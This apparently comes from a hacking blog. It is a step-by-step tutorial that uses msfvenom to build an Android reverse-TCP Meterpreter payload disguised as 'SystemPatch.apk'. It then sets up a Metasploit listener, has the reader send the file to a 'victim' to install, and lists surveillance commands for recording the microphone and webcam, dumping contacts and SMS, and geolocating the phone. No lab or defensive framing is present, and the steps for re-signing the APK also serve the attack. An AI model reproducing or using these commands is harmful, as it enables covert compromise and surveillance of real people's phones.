Msfvenom is a kali linux hacking tool for android ,is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload.
H
acking With METASPLOIT in Kali Linux is a old tool. Metasploit is enhanced by msfvenom in kali linux. Metasploit is now a outdated tool.So, let’s get started!!
STEPS :
- Fire Up kali and open command terminal.
- Set payload and create custom android APK file.Command:
root@Short-wiz:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=74.18.0.45 LPORT=4443 R > SystemPatch.apk
{
To know your LHOST (LHOST is your machine IP address), open new terminal and type ifconfig
1. eth0 : is for Ethernet connects with data cables.
2. wlan0 : for WIFI connections (Recommend if you are on the same wifi as your future victim)
}Your APK file had being saved in the Home folder, as SystemPatch.apk
Note: Don’t add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).
- Start the metasploit framework console as follows :Command:root@Short-wiz:-# msfconsole
- Now it’s time to open and setup multi-handler. Follows the steps :
- msf > use multi/handler
- msf exploit(handler) > set payload android/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 74.18.0.45
- msf exploit(handler) > set LPORT 4443
- msf exploit(handler) > exploit
Payload Handler is being started……..
- Transfer/mail this file (here SystemPatch.apk) file to the victim’s phone and install it.
- When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.
- Try the following exploit commands :
-
- – record_mic
- – webcam_snap
- – webcam_stream
- – dump_contacts
- – dump_sms
- – geolocate
************************************************************************
-
Error fixing(incase you get PARSE ERROR)
Two methods:
1)Type command “d2j-apk-sign SystemPatch.apk”
or
2) To fix this error download signapk – Click here to download
Steps to follow
- Open Signapk folder then open cmd.
- Copy the SystemPatch.apk(the app you made) in Signapk folder.
- Type java -” jar signapk.jar certificate.pem key.pk8 SytemPatch.apk SystemPatch-signed.apk “in cmd(not double quotes).
- copy it in your phone and install it.
Hope this works for you too… 🙂